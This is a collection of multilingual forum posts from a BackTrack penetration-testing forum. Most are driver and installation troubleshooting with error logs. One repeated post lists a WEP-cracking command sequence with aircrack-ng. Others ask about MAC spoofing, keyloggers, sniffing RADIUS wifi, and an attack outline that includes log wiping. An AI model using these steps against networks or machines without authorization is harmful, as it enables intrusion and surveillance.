Innanzitutto premetto che ho sempre usato fedora e la jdk dopo averla installata funzionava perfettamente allora spiego cosa succede :) dopo aver scaricato i pacchetti dal sito della sun, se dovesse servire linko il sito nel prossimo post, e dopo averlo installato nel momento in cui faccio javac file.java l'output della console è il seguente: The program 'javac' can be found in the following packages:
*gcj-4.2;
*jikes-sun;
*jikes-sablevm;
*kaffe;
*sun-java6-jdk;
*jikes-classpath;
gcj-4.3;
*ecj;
cacao-oj6-jdk;
openjdk-6-jdk;
jikes-kaffe;
sun-java5-jdk;
java-gcj-compat-dev;
Try: apt-get install<selected package
bash javac command not found
per completezza la mia jdk l'ho installata in /opt/java
potete aiutarmi?
grazie
Dio90
-
-
18:47
»
remote-exploit & backtrack
I tried the guide here
but everytime I try and install the ati driver I get
(Reading database ... 226943 files and directories currently installed.)
Unpacking ati-driver (from .../ati-driver_9.5-bt2_i386.deb) ...
Replacing files in old package libgl1-mesa-glx ...
Replacing files in old package xserver-xorg-core ...
dpkg: error processing /var/cache/apt/archives/ati-driver_9.5-bt2_i386.deb (--unpack):
trying to overwrite `/usr/lib/libGL.so', which is also in package libgl1-mesa-dev
Processing triggers for man-db ...
Errors were encountered while processing:
/var/cache/apt/archives/ati-driver_9.5-bt2_i386.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
root@bt:~#
this worked before on my machine runnin backtrack pre final, but now its not. I tried removing the driver, but it gives the same error. This happens if I try running this before I startx and afterwords. I've tried installing the backtrack-ati drivers, but same error. What am I doing wrong?
-
14:07
»
remote-exploit & backtrack
Buonasera a tutti, mi presento sono jammito.
uso ubuntu da qualche mese e appena scoperta l'esistenza di una distro come backtrack l'ho voluta provare subito (con virtualbox per ora)
ciao a tutti :cool:
-
13:46
»
remote-exploit & backtrack
HOLA AMIGOS
me llamo alejandro queria consultarles si alguno sabe si hay una guía o tutorial de digital forensics del backtrack 4 final , eh estando buscando como loco algo pero no encuentro nada...
muchas gracias
atte: pelaito
-
9:36
»
remote-exploit & backtrack
HI!!!
Im new to Backtrack,and i have a problem of installing it on my laptop,i downloaded Iso file ,burnt it on DVD
,also made an USB Live on another PC,but on mine ,after reboot with DVD in,i have problem I coudnt start GUi interface,On a first screen i chose something like this "Start Backtrack framebuffer (800x600)" after when everything is loaded i shoud type a STARTX command,so i did that,but I get an error,and nothig happens
That is what i have after typing startx and pressing Enter
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
root@bt:~# startx
warning; process set to priority -1 instead of requested priority 0
Release Date: 10 October 2008
X Protocol Version 11, Revision 0
Build Operating System: Linux 2.6.24-19-server 1686 Ubuntu ■Current Operating System: Linux bt 2.6.30.9 #l SMP Tue Dec 1 21:51:88 EST 2009 i6
build Date: 09 March 2009 10:48:54AM
xorg-server 2:1.5.2-2ubuntu3.1 (buildd@rothera.buildd)
|Before reporting problems, check http:/wiki.x.org to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting. (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (!!) not implemented, (??) unknown.
( = = ) Log file: "/var/log/Xorg.0.log". Time: Thu Feb 11 23:16:26 2010
( = =) Using config file: "Vetc/'Xll/'xorg.conf"
Primary device is not PCI
(EE) Mo devices detected.
Fatal server error:
no screens found
giving up.
xinit: Connection refused (errno 111): unable to connect to X server
xinit: No such process (errno 3): Server error.
root@bt:~#
My laptop is not a scrappy one
Intel(R) Core (TM)2 Quad CPU @ 2.83GHz
RAM 3 GB
NVIDIA GeForce 9800 GTX x2
Now im running Win7 32-bit system
Please help!!!Sorry for my bed english
-
8:05
»
remote-exploit & backtrack
This is related to backtrack because i use backtrack. And no one on yahoo answers answered. But if I major in Information technology, can I eventually land a job in network security. I realize i would have to get certificates but is this how one starts? is there a difference in IT and information systems management.
-
0:18
»
remote-exploit & backtrack
Taxonomia de un ataque con Backtrack 4
En este portal podran encontrar la documentacion sobre como es la estructura o la taxonomia de un ataque, aqui depositare todo el trabajo que se esta haciendo sobre dicha taxonomia.
[*] Documentos
- Reconocimiento de un sistema con << backtrack4 (Footprinting)
- Escaneo de un sistema con << backtrack4 (Scanning)
- Acceder a un sistema con << backtrack4 (Access)
- Mantener el acceso en un sistema con << backtrack4 (Maintain Access)
- Borrado de Huellas con << backtrack 4(Clear log's)
- Reporte << (Reporte algo under)
[*] Videos
- Acceso a un sistema con << Backtrack 4
- Intrusion/Ataque Automatizada con << Backtrack 4
- Borrado de Logs con << Backtrack 4
- Tunneling con << Backtrack 4
- Rootkits con << Backtrack 4
El breve resumen anteriormente dado, es una estructra basica que debemos tener para poder hacer un ataque dirijido hacia un sistema. Intento ser lo mas explicativo posible para que sea lo mas entendible posible.
Taxonomia de un ataque con backtrack 4
Bueno sin mas espero ver comentarios, sugerencias , etc. nos estaremos leyendo
Saludos
-
-
8:01
»
remote-exploit & backtrack
Bonjour
Je cherche un moyen de sniffer une réseau wifi OPEN ou l'identification se fait via un serveur RADIUS.
J'ai fait des recherches, mais je n'ai rien trouvé de probant.
Il y a beaucoup plus d'info sur le WPA ou le WEP ...
Du moins je présume que les échanges avec le routeur doivent être crypté avec une clé différente pour chaque ordinateurs, attribué par le serveur RASUS à l'authentification, la manière du WPA.
Je n'ai pas trouvé d'outil dans backtrack permettant de capturer cette clé puis de décoder les paquets ...
En existe-t-il ?
-
3:38
»
remote-exploit & backtrack
Hello, i run backtrack image on VMWARE and i need open new Konsole window - how can i do it? There is no Shell console window button in systray.
Here is my screen capture
screencast.com/t/MjZjYzU0M
Thank you.
-
2:27
»
remote-exploit & backtrack
Bonjour à tous,
Je viens d'installer BT4 F sur mon PC et il se trouve que quand je lance le gestionnaire d'application j'ai ce message d'erreur
Failed to check for installed and available applications
Quote:
This is a major failure of your software management system. Please check for broken packages with synaptic, check the file permissions and correctness of the file '/etc/apt/sources.list' and reload the software information with: 'sudo apt-get update' and 'sudo apt-get install -f'.
|
Cela est il due à un problème de droits sur les fichiers?
sudo apt-get update me renvoi:
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid Release.gpg
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/main Translation-en_US
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/universe Translation-en_US
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/restricted Translation-en_US
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/multiverse Translation-en_US
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce Release.gpg
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/main Translation-en_US
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid Release
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/microverse Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/macroverse Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/restricted Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/universe Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/multiverse Translation-en_US
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce Release
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/main Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/main Packages
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/universe Packages
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/restricted Packages
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/multiverse Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/microverse Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/macroverse Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/restricted Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/universe Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/multiverse Packages
Reading package lists... Done
Donc apparemment pas de soucis, mais par contre sudo apt-get install -f
me renvoi un code erreur
Reading package lists... Done
Building dependency tree
Reading state information... Done
Correcting dependencies... Done
The following packages were automatically installed and are no longer required:
pymacs python-psyco samdump2-menu python-mode pyrit milw0rm pyrex-mode
framework3-libs netdiscover-menu pychecker
Use 'apt-get autoremove' to remove them.
The following extra packages will be installed:
scapy2
The following NEW packages will be installed:
scapy2
0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
9 not fully installed or removed.
Need to get 0B/397kB of archives.
After this operation, 2597kB of additional disk space will be used.
Do you want to continue [Y/n]? y
(Reading database ... 232402 files and directories currently installed.)
Unpacking scapy2 (from .../scapy2_2.1-bt1_all.deb) ...
dpkg: error processing /var/cache/apt/archives/scapy2_2.1-bt1_all.deb (--unpack):
trying to overwrite `/opt/kde3/share/applications/external/scapy.desktop', which is also in package scapy-menu
Processing triggers for man-db ...
Errors were encountered while processing:
/var/cache/apt/archives/scapy2_2.1-bt1_all.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
et la je bloque j'arrive pas a voir par ou aller pour me dépêtrer de tout ca.
Si quelqu'un pouvait éclairer ma lanterne dans ce sombre moment ca m'aiderai beaucoup.
A bientot.
-
-
18:18
»
remote-exploit & backtrack
hi
i want to join the BackTrack WiFu cours
Ask not what I will do I get aim of this course
Please help from experts in this discipline
Do you advise me to register for this course
What do you think of this course
-
17:49
»
remote-exploit & backtrack
Salve ragazzi
Finalmente son riuscito ad installate ls BT4 sulla mia usb da 4 gb...
ma un problema mi assilla...
Dico sinceramente che il persist e il salvataggio dei parametri non e' tra le mie priorita'....son sempre della vecchia idea che meno si va a scrivere su una flash e' piu' essa durera'....anche perche' si andrebbe a scrivere SEMPRE in determinate locazioni di memoria...e il milione di cicli garantiti...beh... ;)
Torniamo al punto...nella BT4 final purtroppo Gerix...(grande Emanuele!!!) si intoppa e non va...al contrario dopo aver aggiornato il pacchetto sulla mia BT4 installata su hdd...Gerix va che e' una favola!
Non sarebbe una buona idea,visto che BT4 e' da poco su base Debian,rilasciare ...diciamo ogni 3 m3si o quando sia necessario...una Iso "snapshot"...con i bug riosolti e con aggiornamenti vari,in modo da poterla metter cosi' come e' su una usb con Unetbootin?
Idea bislacca?..forse....ma serebbe di un comodo!
Senza contare il fatto che...ad esempio su DistroWatch ci sarebbe una buona pubblicita' per la distro ad ogni snap rilasciata.
Ciao e buon Backtracking!
-
-
5:45
»
remote-exploit & backtrack
Bonjour à tous.
je suis nouveau sur le site donc pas tres vaillant.
pour faire court mon probleme est tout simplement que je n'arrive pas a lancer l'interface graphique de "wicd" quand je clic sur celle-ci rien ne ce passe je ne peut alors pas detecter ma box qui est a proximité.
j'ai bien éssayé les commande ifconfig iwconfig les aimon-ng et autre mais sans succé .
je remercie d'avance les spécialiste.
-
5:39
»
remote-exploit & backtrack
I have switched from BT3 to BT4 on my Macbook Pro 2.1.
My wifi card is Atheros and is detected and working out of the box. In Bakctrack 3 when I used airmon-ng and airodump-ng the signal power was shown in positive dBs but now it's all negative.
It can still inject packets and sniff around but is this normal or should I update the drivers or smt?
Thanks
-
4:53
»
remote-exploit & backtrack
Im using backtrack 4 final and use "macchanger -m 00:11:22:33:44:55 wlan0" to change my mac address. I can connect to my SSID with no problem.
But in windows, i use macshift to change my mac address but i cant connect to my SSID. What actually macchanger in backtrack do?? Can anyone explain shortly to me..
-
4:28
»
remote-exploit & backtrack
i am going to install empathy into my backtrack 4 final.. Is it possible?i cannot find it is support for kde(backtrack) or not. Does anyone did this?
-
3:07
»
remote-exploit & backtrack
Hi,
first is there any reason why bt4 doesn't come with the current version of airpwn? Are there stability problems with the new driver? I am fine with the old version, but just wanted to give it a try!
So, i guess after the removal of the old version my first question is can i work with the installed version of lorcon 171-bt0?
In the case of no, i removed it and tried to compile the source but i was stopped after configure by
Code:
configure: error: *** Missing working Linux wireless kernel extensions ***
In the case of yes,I started compiling airpwn 1.4 configure seems fine but than i got hit by this:
Code:
make all-am
make[1]: Entering directory `/root/airpwn'
if gcc -DHAVE_CONFIG_H -I. -I. -I. -g -O2 -MT airpwn.o -MD -MP -MF ".deps/airpwn.Tpo" -c -o airpwn.o airpwn.c; \
then mv -f ".deps/airpwn.Tpo" ".deps/airpwn.Po"; else rm -f ".deps/airpwn.Tpo"; exit 1; fi
In file included from airpwn.c:35:
/usr/include/linux/wireless.h:2: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'file'
In file included from airpwn.c:35:
/usr/include/linux/wireless.h:4:17: error: too many decimal points in number
/usr/include/linux/wireless.h:6: error: stray '@' in program
airpwn.c: In function 'process_ip_packet':
airpwn.c:509: warning: ignoring return value of 'write', declared with attribute warn_unused_result
airpwn.c:510: warning: ignoring return value of 'write', declared with attribute warn_unused_result
airpwn.c:511: warning: ignoring return value of 'write', declared with attribute warn_unused_result
make[1]: *** [airpwn.o] Error 1
make[1]: Leaving directory `/root/airpwn'
make: *** [all] Error 2
Thx
Seeknet
-
0:40
»
remote-exploit & backtrack
Salve a tutti,
ho installato da poco backtrack ma non riesco a far funzionare il wifi...
cosa ho saltato? devo installare la scheda?
-
0:35
»
remote-exploit & backtrack
hello Everybody!!!
i have decided to install backtrack 4 on my laptops hard drive, as i was using BT3 off a live cd, now bt3 never gave me a problem with my wifi card which is an intel 3945. after i finished instaling bt4 i tried using my wifi and notice that it doesn't detect it, can anybody please help me out?? also i tried cracking my own wep with backtrack 4 just like i did on bt3 but notice the command ares different can anybody help me out if possible??
i used to use this command:
modprobe -r iwl3945
modprobe ipwraw
ifconfig wifi0 down
airmon-ng stop wifi0
macchanger --mac
airmon-ng start wifi0
airodump-ng wifi0
airodump -c -w --bssid wifi0
aireplay-ng -1 0 -a -h -e wifi0
aireplay-ng -3 -b -h wifi0
aircrack-ng -n64 -b (whatever the name was).01.cap
has any of this change on bt4??
sorry if my questions are too stupid but if i never ask i will never know
-
0:35
»
remote-exploit & backtrack
hello Everybody!!!
i have decided to install backtrack 4 on my laptops hard drive, as i was using BT3 off a live cd, now bt3 never gave me a problem with my wifi card which is an intel 3945. after i finished instaling bt4 i tried using my wifi and notice that it doesn't detect it, can anybody please help me out?? also i tried cracking my own wep with backtrack 4 just like i did on bt3 but notice the command ares different can anybody help me out if possible??
i used to use this command:
modprobe -r iwl3945
modprobe ipwraw
ifconfig wifi0 down
airmon-ng stop wifi0
macchanger --mac
airmon-ng start wifi0
airodump-ng wifi0
airodump -c -w --bssid wifi0
aireplay-ng -1 0 -a -h -e wifi0
aireplay-ng -3 -b -h wifi0
aircrack-ng -n64 -b (whatever the name was).01.cap
has any of this change on bt4??
sorry if my questions are too stupid but if i never ask i will never know
-
-
22:00
»
remote-exploit & backtrack
Escaneo de un sistema con bt4
En este documento hago la explicacion de algunas de las diferentes formas que hay para escanear un sistema con backtrack 4, los temas que trataremos seran:
Escaneo de un sistema con bt4
[*]Escaneo de puertos
[*]Escaneo de Servicios
[*]Identificacion de banners
[*]Identificacion del sistema operativo
[*]Fingerprinting
[*]Escaneo de vulnerabilidades
Bueno sin mas espero que les guste.
Descarga
[*]RapidShare ------> hxxp://rapidshare.com/files/346098751/Escaneo_de_un_sistema_con_bt4.pdf.html
[*]Filedropper ------>hxxp://(www).filedropper.com/escaneodeunsistemaconbt4
Saludos
-
19:23
»
remote-exploit & backtrack
I am trying to follow online instructions from all over to install the intel pro wirless driver in to BT4.
I am trying to currently install the Ieee802.11 modual and i get this.
root@bt:~/ieee80211-1.2.18# make
Checking in /lib/modules/2.6.30.9 for ieee80211 components...
make -C /lib/modules/2.6.30.9/build M=/root/ieee80211-1.2.18 modules
make[1]: Entering directory `/usr/src/linux-source-2.6.30.9'
WARNING: Symbol version dump /usr/src/linux-source-2.6.30.9/Module.symvers
is missing; modules will have no dependencies and modversions.
CC [M] /root/ieee80211-1.2.18/ieee80211_module.o
/root/ieee80211-1.2.18/ieee80211_module.c: In function 'ieee80211_init':
/root/ieee80211-1.2.18/ieee80211_module.c:268: error: 'proc_net' undeclared (first use in this function)
/root/ieee80211-1.2.18/ieee80211_module.c:268: error: (Each undeclared identifier is reported only once
/root/ieee80211-1.2.18/ieee80211_module.c:268: error: for each function it appears in.)
/root/ieee80211-1.2.18/ieee80211_module.c: In function 'ieee80211_exit':
/root/ieee80211-1.2.18/ieee80211_module.c:297: error: 'proc_net' undeclared (first use in this function)
make[2]: *** [/root/ieee80211-1.2.18/ieee80211_module.o] Error 1
make[1]: *** [_module_/root/ieee80211-1.2.18] Error 2
make[1]: Leaving directory `/usr/src/linux-source-2.6.30.9'
make: *** [modules] Error 2
-
18:24
»
remote-exploit & backtrack
this wasent the question i was going to ask. i was going to ask why my wifi wasent working when it worked in bt4 pre final but as i was typing the question i remembered my wifi led never changed color with pre final so i tested it thats working fine i figured out on my own how to get the ethernet working.
so now my question is how do i install flash player 10 for youtube videos
theres a drop down list that says taz apt other linux filetypes ect
im not sure which type to pick
do i need to have bt4 installed for it to even download the file
and if so whats the easiest way to dual boot with windows 7
windows 7 will be on the 140 gb partion
and bt4 on the 10 gb partion
thanks for your time and effort in posting a reply
i seem to have forgotten alot i have learned which hopefully ill remember by exploring this great new final release
-
14:52
»
remote-exploit & backtrack
About my setup:
MacBook Pro Santa Rosa (mid 2007) 2.4 GHz Core 2 Duo
When I got my new 500gb hard drive, I partitioned it with 420gb for OS X, 40gb for Windows, and 40gb for Linux.
I then installed rEFIt and Windows 7 which all worked properly.
Last night I installed BackTrack 4 Pre-Final, resizing the Linux partition to 38gb to create a 2gb swap. Once the installation was done, BackTrack worked fine, and OS X still worked fine. Though when selecting Windows or Linux from rEFIt, I get the same Grub boot picker screen. First question: how can I get rid of this?
Second and more important problem: When I choose Windows from the Grub menu, I instantly get a Windows screen telling me there is an error with \Boot\BCD and that "an error occured while attempting to read the boot configuration data."
It would seem grub did something to mess up Windows' boot loader. When I insert my Windows 7 disc to try and repair it, the disc tells me something about it not being compatible with the OS installed.
Any ideas as to what I can do to get Windows to boot?
-
14:37
»
remote-exploit & backtrack
HI mate,
When i run for a long time the live cd, its suddenly quit from the programs and show a black screen where sometimes is freeze (like a critical error).
Last time it happen when i trying to update the exploit database is that playing any role..
Can anyone help me?
-
14:25
»
remote-exploit & backtrack
I made a prog which solves the problem of typing and tping in order to hack a WEP.I've heard about spoonwep etc but I've heard about bugs in backtrack 4.Of course this prog is much less important than spoonwep but it becomes extremely useful sometimes.
rapidshare link:
rapidshare.com/files/345976934/hak.tar
Open a terminal,go into /hak directory and type "make" without the brackets as root.Type hak as root as well.
-
14:13
»
remote-exploit & backtrack
Backtrack 4 load testing rtl8187 driver.
I know that includes the old driver r8187.
To make the change to our wifi driver must stop the interface to edit the file after locking drivers, go to:
# ifconfig wlan0 down
# vi / etc / modprobe.d / blacklist
we need to find and replace the r8187 driver blacklist r8187 blacklist rtl8187 by, so that we replace the load module by default we are really interested. Save, close and proceed to replace the driver loaded but SHOW ME AN ERROR.
# rmmod rtl8187
root @ bt: ~ # rmmod rtl8187
ERROR: Module rtl8187 does not exist in / proc / modules
What should I do? I'm doing wrong? How do I do?
my English is not very good, sorry.
thanks!
I expect an answer
daniandujar@hotmail.com
-
12:33
»
remote-exploit & backtrack
Hi all! I hope I am posting to the right section...
I am currently working on a program in C...
What I want to do is not only to call a system's .sh file, but edit the .sh file in a way that the user have the opportunity after running it to set his on variables.
For example:
In my C program in a point I say:
if (a==1) {system ("/home/alex/scripts/prog/macchanger2.sh"); system("/home/alex/Qt/hak/hak);}
Well, the problem is that the macchanger2.sh is something like this:
echo "Type your new mac address:"
echo
macchanger -m yy:yy:yy:yy:yy:yy wlan0
How can I tell the script to let the user type his preferable mac address and put it where yy:yy:yy:yy:yy:yy is?
I hope I were understandable enough....If not, plz let me know....
-
10:59
»
remote-exploit & backtrack
Buenas de nuevo como verán soy algo nuevo en el tema de test de penetración, mi otra duda es la siguiente:
Existe algún Keylogger que pueda instalar en esta excelente distribución de BT y si es así como se instalaria y como veria el funcionamiento del mismo?
Existe algún keylogger que se instale en windows xp y vea todo lo que hace ese ordenador desde backtrack? como se haría?
-
10:20
»
remote-exploit & backtrack
I have a laptop that supports 1600x900 but i cann't for the life of me get this within BT4 in vmware. I can get other large sizes.
Im using the latest BT4 vmware image.
I have tried the usual editing xorg.conf and xrandr etc.
Can the vmware tools support my resolution?
I have Ubuntu 10.x in vmware supporting 1600x900 and it looks beautiful!
Any suggestions on what to try next?
D